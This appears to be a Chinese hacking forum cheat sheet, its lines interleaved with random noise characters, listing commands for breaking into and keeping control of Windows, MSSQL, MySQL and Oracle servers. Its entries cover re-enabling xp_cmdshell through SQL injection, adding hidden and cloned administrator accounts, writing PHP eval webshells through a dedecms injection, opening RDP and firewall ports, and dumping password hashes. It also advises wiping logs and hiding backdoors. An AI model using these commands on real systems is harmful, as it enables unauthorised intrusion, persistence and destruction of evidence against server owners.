8 i1 Z! w+ l4 Q3 \' M D* a2 k
1.net user administrator /passwordreq:no
$ Y# U! L! o3 r5 \这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了$ u# _& O( h& g0 E# P: m" {0 v
2.比较巧妙的建克隆号的步骤
; I# n* k( C9 ^, k/ s+ |1 W2 Y" e先建一个user的用户' t; M$ F2 H4 D9 R J- J! f, P \$ l
然后导出注册表。然后在计算机管理里删掉
' t+ C& @6 p Y9 s在导入,在添加为管理员组8 b0 a. @4 J: z7 L0 v6 l" k0 x& I7 Q
3.查radmin密码7 J: x. t( a& e) ?
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
( Q4 L% Y6 c5 }' ~$ F* q6 M: @5 J0 w4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
, a5 ]( |# u5 K3 [建立一个"services.exe"的项% G* V9 Q1 D+ g. K0 L
再在其下面建立(字符串值)' w5 I7 o+ x4 B$ i/ }8 Z, g
键值为mu ma的全路径
) D- d) U% z% n$ h7 ~% m5.runas /user:guest cmd9 g9 |0 b/ S& W; d/ x
测试用户权限!3 j7 K8 i& Q1 A8 k: J0 ^8 @
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?/ C8 |5 d* \* l& {5 E
7.入侵后漏洞修补、痕迹清理,后门置放:8 ~/ h( i) I: q, a! m( g+ {* g
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
+ J& h q* A3 P8 F) ], K6 q8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
6 c, l8 q* l$ @ K3 }
0 H" W0 Z, {2 y- s2 wfor example7 V! N% m5 y3 }6 Z
( R; T. \( e: T3 ]5 r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'9 V8 O- U2 I7 i1 e: [) j
3 e, {! u$ h2 e# R' b0 e0 `7 B l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
; N4 N) w% j, j0 R6 p
H) F5 q% p$ m" _9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
6 Y0 W' r I, D2 ]! }% i如果要启用的话就必须把他加到高级用户模式
5 M$ }+ V i. p可以直接在注入点那里直接注入- n( c, A, E" t6 N
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ _6 g' k4 W) Y0 F, k W然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
1 G& S" M. B: U9 u或者
3 T' s: T) W. U Dsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 o, {0 I5 u: v- p, v
来恢复cmdshell。
. M1 v) q& N3 V$ m3 M1 j6 }+ X$ [/ Z {# N, v2 h$ R9 S1 o' G
分析器
. Z) z! S. G8 o! hEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 O5 f' i, m O' D& D- K: `
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
4 |/ T, d& @$ a% c2 Q' s10.xp_cmdshell新的恢复办法8 o! V) x7 Z" G' a
xp_cmdshell新的恢复办法
4 ]2 ~& ^' p( h. J扩展储存过程被删除以后可以有很简单的办法恢复:
8 k2 w: v/ {" G7 M删除4 d1 e! z- X' ^4 q; ~
drop procedure sp_addextendedproc
8 h4 Q; | |( w2 B3 y' R* ~drop procedure sp_oacreate
) F& N q- L, p# e% oexec sp_dropextendedproc 'xp_cmdshell'+ `+ X: h) |8 r7 I
# I( n+ i5 e9 v3 R/ Q: ~' X恢复
; U- B. J3 y ~9 m1 cdbcc addextendedproc ("sp_oacreate","odsole70.dll")+ D# L9 p4 `% f, g; t
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")1 c* K5 F/ D% `5 C
" O& h* S3 I4 t
这样可以直接恢复,不用去管sp_addextendedproc是不是存在- [; W) {# A+ Z0 n% M1 |! V
/ ^0 h: ^- O9 c) H; G-----------------------------. r3 A& V3 Q" ^( |- C
0 A) j! n/ V! H9 _
删除扩展存储过过程xp_cmdshell的语句:
8 j, C3 D3 u F% x& Bexec sp_dropextendedproc 'xp_cmdshell': o+ G0 k4 g6 c1 I1 W. y _( e
$ X' G& y: x# i0 [* Q# @! d
恢复cmdshell的sql语句3 v" v" K$ j7 P3 L) G' M
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll', K/ H' {' x; u
4 n4 [' b: F7 _' w, n6 t" n7 M) V
+ ]1 S' k* W: x5 f% W
开启cmdshell的sql语句
d2 G; S1 _' c8 ~% k, p; ]. j
+ E" K; S! ]* l6 a6 q w8 dexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
# i; q" v! l0 H' v8 g( F: r) Q
: X" X" { E0 }( M) B' p: G判断存储扩展是否存在; |, ^1 ~: a4 V) \* O$ h
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
' F) h, h4 M2 w M+ w( ~# W返回结果为1就ok
! T( P2 ~& _& N- Z( c
8 ~, A+ h4 y5 m7 |& `) b" e! Y恢复xp_cmdshell
4 S) ^4 h: K! A2 Qexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 v7 y7 h( V( T% Y/ A
返回结果为1就ok
; o( q3 e4 a. A7 L
3 p: Q* c, }- n+ M# A2 C否则上传xplog7.0.dll
; ?) ~6 G* |8 p' Aexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'0 F% A8 Y4 l$ n1 `! p7 P [8 l% X
* ?5 _% }* K% g# o, T4 |
堵上cmdshell的sql语句' T' l# D2 o3 s+ u( `1 f
sp_dropextendedproc "xp_cmdshel& F+ \8 S) _! H
-------------------------$ f/ j5 ]7 W n, _
清除3389的登录记录用一条系统自带的命令:
( @; R& q ~# q. [; A- S! ]reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
. } B/ [2 v7 x( l3 h, g i- ?* M& ?
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& e. u' i5 T' W4 `% T, f
在 mysql里查看当前用户的权限
. ~2 B+ w2 A. {0 V; [ A" T& j7 }show grants for , Y, M) ^5 E/ P" k e
" h! S1 Z- C5 W以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。0 T f$ i0 w8 W8 L' l
$ M |6 t: [" H! L+ J2 H. f. M. X
& D7 n) v3 y- L. p2 w
Create USER 'itpro'@'%' IDENTIFIED BY '123';: @. r' T7 S, J: ]% m6 t2 S( \$ B
$ a' a1 X% U; e8 D9 _
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
: f7 M/ W" M/ E v
+ N4 W0 }8 O1 x' U$ C$ wMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 R& U, O4 j3 E5 x# Y% g0 {# u. d: h! a
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
& l5 \5 L' ]$ L- ?0 z8 l$ i1 p9 s8 z& ~. K5 ]
搞完事记得删除脚印哟。4 O" h7 O" ]) m( F# o9 {' J% g2 ?
8 ~! F0 J y& v) L
Drop USER 'itpro'@'%';
( n; c: l/ h2 |4 b/ W
! r' c' y6 l7 X: d' G B. M' ? i9 T6 cDrop DATABASE IF EXISTS `itpro` ;
/ W0 l* |; E' [
. ?3 P: D* h& |* j9 K当前用户获取system权限
9 S) |% l) |# r7 J" q- jsc Create SuperCMD binPath= "cmd /K start" type= own type= interact* S% F# T/ w9 }
sc start SuperCMD/ P3 ~3 r, o% I+ X+ \8 b
程序代码
3 w0 M6 F9 H/ W# z3 |<SCRIPT LANGUAGE="VBScript">- z: Y1 U( [; Q; S$ M/ D. k
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
, z3 G% t% K0 S1 C Z6 M9 Oos="WinNT://"&wsnetwork.ComputerName
4 y; S% s' I) l8 aSet ob=GetObject(os)0 [9 ~! g) C2 Q2 T* m1 H
Set oe=GetObject(os&"/Administrators,group")" K. ^' o1 @# v" N+ r
Set od=ob.Create("user","nosec")4 j' H2 ]. x5 N# g+ A, f
od.SetPassword "123456abc!@#"
: s4 y) c$ @! g5 E! G- Z2 g1 ?2 Mod.SetInfo
3 d$ d# l& ^* B- S: h1 sSet of=GetObject(os&"/nosec",user)% q) d y( N+ U) Z/ m. ^
oe.add os&"/nosec"4 S* o; e4 r' b1 z; {' g- a' H
</Script>
9 R; O0 h( o3 ~' _<script language=javascript>window.close();</script>8 U/ S" d. Y) v/ P7 P
6 \& e) X( Q/ D u+ T5 X* s
1 a* k, a3 Y1 z1 E3 P' |% e3 F# V
4 D! T1 o# j* L c. m
- E0 f2 z( l' b$ d突破验证码限制入后台拿shell
5 P6 S- Y# [; V _. Y程序代码( {& n$ e. F- L1 C" ~ M# U+ R
REGEDIT4 : u/ g. ^" B) }3 m5 ^2 d M- S+ I& a8 J8 K
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
x* b4 K/ \8 O' p! S"BlockXBM"=dword:00000000
' S2 j$ w: l9 `1 \* y7 i7 l$ R. P. y4 M4 _" U
保存为code.reg,导入注册表,重器IE) ?/ k" L; U- K$ T3 @4 z
就可以了
) Y6 ?3 O! B) z4 s- R1 Hunion写马6 ~$ W1 G& {( }; X
程序代码& `3 e2 ~/ c7 j+ P0 U$ c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
2 ~" D* ^; {/ p2 {2 C% }
( E& _1 _! R7 X; n2 i应用在dedecms注射漏洞上,无后台写马
M5 b1 G) P5 T: E8 |% \dedecms后台,无文件管理器,没有outfile权限的时候
; f z+ D% |' q. e4 x1 M4 ]在插件管理-病毒扫描里7 d% Q1 c# g6 q" F+ F% A
写一句话进include/config_hand.php里; U+ V$ T. g' J0 x3 v6 K: {
程序代码4 @6 U) b {4 Q. ?' O
>';?><?php @eval($_POST[cmd]);?>
3 I9 w# A& Z, N. k: x! w2 ^% [0 C" m7 d/ J( g. o9 C/ j6 Q# J
5 \4 g5 k: M" ^8 w* e0 x如上格式 H& l) a. B7 ~% t) |7 U
* t6 U! v4 d2 Horacle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解( v/ m1 V. z$ O* T! B# G6 x' b
程序代码
2 w6 T/ x1 d$ a0 s' m. W! ^select username,password from dba_users;
9 g: D U" Z! \& w) `/ N& o1 o' d5 g$ f
& m% c7 }4 N/ [; W! U
mysql远程连接用户" m# ^% E9 r, P! f! U- P
程序代码) y/ h0 V* T" `6 B; n) z0 @" k: j+ t
, }9 K- S: [* u1 @% K, `$ q9 G1 C
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';: P9 Y. x1 Q3 o8 A2 U
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION. K9 s2 Q- @# {' Z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
6 o- ]* l: ]5 H" UMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
y+ O( F5 d6 `8 r( N3 G2 e! u) g7 B3 c. W
8 T" [" r, O+ c, [$ _1 k- I
+ F* R* U; z/ L1 \6 w" P1 f1 L
! G( U. V8 n0 ^echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0; F5 j1 q9 ?5 w: N0 X) q
9 O, n7 ]) g8 Z& f0 i
1.查询终端端口
6 q- B; D0 u& _# y8 U4 S- ?0 x# b& h8 t* m6 t
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber/ }4 o. V5 x9 u7 F! T. P
) E: c* l7 B2 f+ f通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp" L, t# b. _4 n8 r2 X4 A, F
type tsp.reg
a& o Z3 f1 u) c4 R
0 s/ g! E7 [+ r' \' m$ |; I$ D2.开启XP&2003终端服务! V5 w3 b$ j* A \' _
4 x" q& n4 S) L$ Y( B9 [& J* r+ e/ c. v
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" t: k0 i4 i$ ^1 i8 _+ b
& s2 B2 k" f7 U% ?
7 ?, b$ s5 J! M6 n' O; Y4 V3 P! ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# _$ O4 V7 V h# { M& B% U, `$ `& [8 H
3.更改终端端口为20008(0x4E28)
7 ^) G, c7 \6 z1 G" w; S+ w" P. p- P+ f* q# ?/ E- j
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; E6 Q" T$ H9 R' y" J' J. R2 r' \( \* O, {8 K9 A$ @/ F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f ?' X+ K+ o8 h. w6 p" ^
. R' D. f" [- V4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
4 w% q5 O, Q1 H# l5 \( ]$ |2 E
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f6 l8 q6 u+ v8 K1 u7 }# V7 ~
; r2 q4 l# u8 D8 N" K% X. b
$ } L- m" d7 ?6 H5.开启Win2000的终端,端口为3389(需重启)! l: Q9 B1 h9 X/ [. l
2 G- o9 }) P% ]8 X
echo Windows Registry Editor Version 5.00 >2000.reg
# r1 I4 o) P3 _% e/ F# ?3 Q9 i4 G, `echo. >>2000.reg8 C/ y" Q0 \) O/ B0 m, F3 f/ x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
4 M! O- R& ?* s/ h9 \echo "Enabled"="0" >>2000.reg
6 e5 ~/ Q' P" K: }! [% j9 qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg & D& D& V* m9 L6 e }1 n
echo "ShutdownWithoutLogon"="0" >>2000.reg
) [6 T" U0 w( b3 U* Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
9 H5 A1 V" S+ C4 D; Y" l) W1 V) e0 aecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg / Z4 \% E; k6 q8 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ( T! h/ U n" \7 _
echo "TSEnabled"=dword:00000001 >>2000.reg
9 {; _4 M0 Z+ x( X9 q+ b/ e8 Z$ \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
/ W: Q* B4 E2 Z3 f7 K# recho "Start"=dword:00000002 >>2000.reg 6 V" Q* B) h& M# T1 @/ C+ ^- A! w- r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
/ @; y& v8 s- ^- {# a/ ^- Zecho "Start"=dword:00000002 >>2000.reg % j9 Q( c3 T0 R6 t6 D1 ^
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
# Z# r! a3 t2 f! _! D! `4 E& jecho "Hotkey"="1" >>2000.reg
" K% A- a) n, b$ q% ~: ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
. W* I8 r. I) f9 ~" @2 recho "ortNumber"=dword:00000D3D >>2000.reg . Z3 V2 e/ t2 X" r1 s% f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 9 w; Y' }' L* Z% e
echo "ortNumber"=dword:00000D3D >>2000.reg3 R0 Y }1 e0 L
' {$ e9 r* e- O
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): ~1 b' z/ o1 j8 f- j. t
0 F; W/ s+ N0 h0 A3 q6 a
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
0 F b# D R. e4 x9 y7 }(set inf=InstallHinfSection DefaultInstall)- _2 R7 a7 k, G& e- u
echo signature=$chicago$ >> restart.inf; T# D a& _: D2 E
echo [defaultinstall] >> restart.inf
# M% }) F) q( vrundll32 setupapi,%inf% 1 %temp%\restart.inf$ q6 ^) g4 S, k% `7 B _
7 b' s$ e5 e6 F9 C! h8 f; C
+ b4 h k, d* S$ ]4 a! q
7.禁用TCP/IP端口筛选 (需重启)) |: i( x+ X2 K$ P
1 q) N2 M6 n5 b+ I
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f' Y8 X% M. k% d
6 |+ D3 e2 p0 j. r2 }$ p* Q! ?! [
8.终端超出最大连接数时可用下面的命令来连接+ H8 B6 K* w X6 a
( w) G. V+ ^) g) A0 M2 S, |
mstsc /v:ip:3389 /console1 Y# b: `( e4 W2 B
( Y2 c8 B& t& y. ~1 T7 O9.调整NTFS分区权限
! |! i* w. @# n; r3 j4 C4 N$ P. H5 E( e# {
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
3 T4 ~6 |0 T7 i3 m/ }. A* a' X" s3 F5 ]3 U& N
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
! `* ~9 s$ C- [- d$ x4 m: g+ A& A% V
------------------------------------------------------& D; |' O3 z# z( ^
3389.vbs
3 e4 d" h% l( A/ {: `0 qOn Error Resume Next
" v B8 _& a: E3 \! }( jconst HKEY_LOCAL_MACHINE = &H800000023 j2 l* p a; x1 K
strComputer = "."
' H' P. v+ a# y( k Y' @. g; D, S& ^* RSet StdOut = WScript.StdOut3 Z) G/ B: V2 J9 s2 u1 I; Q; s+ W
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_6 z; q+ O5 n, E9 y2 m* @
strComputer & "\root\default:StdRegProv")
8 V/ R( M4 c1 C6 C' p! y$ CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
7 r/ g" P# Y0 p; ?oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath% N- _& G5 a% t7 y: T7 h0 x3 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# t. U4 U' A" `" J* Ooreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath" n% Q* f2 p# r) Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" e* Q+ ^# D3 O7 p1 ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 o1 s. \8 f+ J" s& u- dstrValueName = "fDenyTSConnections"
8 E2 F) J9 }/ u! b7 z: P% edwValue = 0% x! P J% q# V! T. B# X
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue9 ?+ c0 Z1 e0 d6 O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 A+ n2 R, n: l1 }strValueName = "ortNumber"
. E2 N6 Y0 v' b! EdwValue = 3389( g9 X. C! N( _& Z( L
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& ^8 G6 J: P$ s& k8 YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 j9 v6 \' u! ]% K$ b. x
strValueName = "ortNumber"
( n! U& q# ~, q4 t8 _! HdwValue = 3389$ s4 D8 h; c* s- ^# q( q3 g3 S) s
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. z X; t1 z; ]* p/ @
Set R = CreateObject("WScript.Shell") + K2 f) S3 f3 l7 k0 b1 a
R.run("Shutdown.exe -f -r -t 0")
' F6 K* X$ x, x+ @1 ^
+ s( o! r* L) t* W( G1 P8 B删除awgina.dll的注册表键值9 L) r' h+ D M' |. ?, g
程序代码
s3 f% w2 B* v5 t7 Q7 T( X \9 v( k0 P3 {( D9 }9 u6 p O; {0 V
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
- x; e$ a4 \4 t# Z# O6 n- C
" N! B; a9 r# M: \' f3 {
& V3 @" f- i, ?5 `, G
1 S( h" V4 ` w4 z; b
8 y0 E! @5 Z9 r s+ r程序代码# R9 u+ [5 P4 X8 a% Y+ n2 `
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash2 ?. z+ B/ Q+ R' B
. M' A* f4 P$ s设置为1,关闭LM Hash2 G# m z" v1 Z0 o4 C6 ~0 s. P
9 O v, u/ x+ I3 D' ?2 ]3 E数据库安全:入侵Oracle数据库常用操作命令" k* d8 l0 x o, K: G
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。+ p/ p* H0 l: U8 t6 G; @* q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。3 U# i) ]7 s. E [" f2 W3 z
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
/ }3 `' H$ U# l1 C3、SQL>connect / as sysdba ;(as sysoper)或
, R5 o$ {+ K" H) nconnect internal/oracle AS SYSDBA ;(scott/tiger)
( B. E/ H- D* U6 ?* Nconn sys/change_on_install as sysdba; V+ Q8 d8 y C5 v
4、SQL>startup; 启动数据库实例
' |* I0 X' E& d8 A2 m5、查看当前的所有数据库: select * from v$database;; @, O6 d- ~4 {* P: N' n6 u$ i% v
select name from v$database;
0 R) {/ T5 k9 k3 v; H) ?9 J4 a6、desc v$databases; 查看数据库结构字段7 h1 Q6 v; V8 Q8 N. J
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
* w% D' y/ H3 l6 h' aSQL>select * from V_$PWFILE_USERS;
# R" d. n: h$ [7 _8 ^; b7 GShow user;查看当前数据库连接用户
7 d( Y5 U) i3 w. f$ I- h8、进入test数据库:database test;. q" A p6 X9 |
9、查看所有的数据库实例:select * from v$instance;
% ]3 |- N5 u* b7 v ]如:ora9i
* k9 }3 S! B7 \/ J9 @- I: s10、查看当前库的所有数据表:* x- E ~9 S7 b+ G
SQL> select TABLE_NAME from all_tables;: @5 [0 O& ^5 T; n
select * from all_tables;
/ e; _* j2 z7 h nSQL> select table_name from all_tables where table_name like '%u%';
# b6 z* q* W; P* m% wTABLE_NAME6 p! [; s0 G( F2 Y( @# t5 V' h
------------------------------
4 D" Z3 S# R6 x8 Z_default_auditing_options_# I( ?. q. N. o6 q
11、查看表结构:desc all_tables;
- h4 e( C- _' l% g12、显示CQI.T_BBS_XUSER的所有字段结构:
* I$ H2 Y: T2 q% m! k$ wdesc CQI.T_BBS_XUSER;
5 L( B. b1 r1 S7 d" N/ k7 H z13、获得CQI.T_BBS_XUSER表中的记录:8 _/ i5 k% |' K
select * from CQI.T_BBS_XUSER;3 o8 P8 |3 a' |8 O: j8 P" Y! {% W
14、增加数据库用户:(test11/test)
' k6 s5 y5 c8 j9 |! mcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
: O3 S2 h& C( p& Q15、用户授权:
/ n$ k3 D6 m5 N T% h; y# E4 Mgrant connect,resource,dba to test11;! r: l; h! t ^; D' L
grant sysdba to test11;
) R, I; W; b# M4 m9 k! o, ~commit;
, n5 M8 f4 w- l( ?1 m& q16、更改数据库用户的密码:(将sys与system的密码改为test.)
, m$ q& v6 n3 Ualter user sys indentified by test;4 E* [, G, n3 d* h* D
alter user system indentified by test;
- [2 w8 x4 t; ?
) E8 H$ Z2 y4 K; K( CapplicationContext-util.xml+ Y9 U: p5 A9 A! G- L' Q( u
applicationContext.xml# J: e$ G- u+ p$ z+ o, C
struts-config.xml
T- ]$ C5 p7 b: c8 |2 Hweb.xml( W' \- K0 i' B1 N
server.xml
4 M9 h! b1 w$ |! v9 n5 |6 ?! z$ wtomcat-users.xml0 _0 P! U5 P+ Y: J8 P8 {* f$ o: m
hibernate.cfg.xml; Y4 B5 f) u9 }$ b: ~
database_pool_config.xml
r, c( K+ f3 }" X' }
+ E% J( G+ P6 C
3 l. ^& f6 v( s! `6 Z* O# p\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置6 h1 f5 r7 N: M* G( J/ t5 P$ ]
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
8 {9 w e v! U9 N$ A0 P: V8 Z\WEB-INF\struts-config.xml 文件目录结构
+ n1 D8 O$ L1 f6 k& G
' Z9 {% i% ^: R* Y K% U4 d- fspring.properties 里边包含hibernate.cfg.xml的名称8 S8 O9 `1 s* s3 t8 G
1 w) [6 j# p2 t4 p
% C* C) {5 [2 XC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml. i$ j3 h8 y# y% p# C- s: I6 n
& u" n+ w! `. P& F! q+ u如果都找不到 那就看看class文件吧。。) C( f# @2 o3 h# L x+ M7 d: \
3 u# J/ z- ?2 H测试1:; z8 d& y- X+ D( x# |2 D
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t18 S) H" V8 v: D4 H* ?7 T* C4 l
; x# i7 X. R! J测试2:) u0 Z5 X; F# O
. |7 E! H8 [( d2 Z; m: }
create table dirs(paths varchar(100),paths1 varchar(100), id int)
- ~, u# L2 k% B
, _3 S( N2 V% Sdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--; d4 G' k- d* [4 O
6 |- c7 U* A: O6 S( SSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1& O2 E( Z1 ~ i& e! k- y/ P, k
# D3 o4 d. b3 F" B
查看虚拟机中的共享文件:
' D0 f, l# h: \) _在虚拟机中的cmd中执行2 W) j. F8 Z( |; |' A
\\.host\Shared Folders
' l: `% i+ Z( F4 `1 I+ r, S* U. g/ V9 t: H7 U! j& u6 v4 t: B
cmdshell下找终端的技巧: \" p4 Y1 e0 M* E" O$ ^9 _* C
找终端: 2 P: s; S7 H) a3 O% `6 o; Y+ Z
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
! [ b4 m& P9 T 而终端所对应的服务名为:TermService
# U$ G4 F: ]* d/ v5 d/ m第二步:用netstat -ano命令,列出所有端口对应的PID值! % ~6 d9 T |* R9 V; N7 H" V# B
找到PID值所对应的端口. m( S: [, t5 c3 g
# ^8 F6 `% ]* d8 }& E
查询sql server 2005中的密码hash
. P9 M5 c4 V! @" r6 G: s5 eSELECT password_hash FROM sys.sql_logins where name='sa'
3 h+ b: L1 ~0 M+ f( o' q) K H1 ~8 oSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a+ }' U" D; S( `* ~
access中导出shell7 F$ Z' ~; A2 l ?
" F+ z9 }& v5 ]1 c# G1 M中文版本操作系统中针对mysql添加用户完整代码: M5 C: b+ V4 {8 c! s
$ ^1 k! m! H4 R* }, R% _5 W1 Nuse test;
0 [7 z: |+ o! i$ mcreate table a (cmd text);
' T. d0 U; K. z! n1 Uinsert into a values ("set wshshell=createobject (""wscript.shell"") " );; H0 A& k' X, E# \
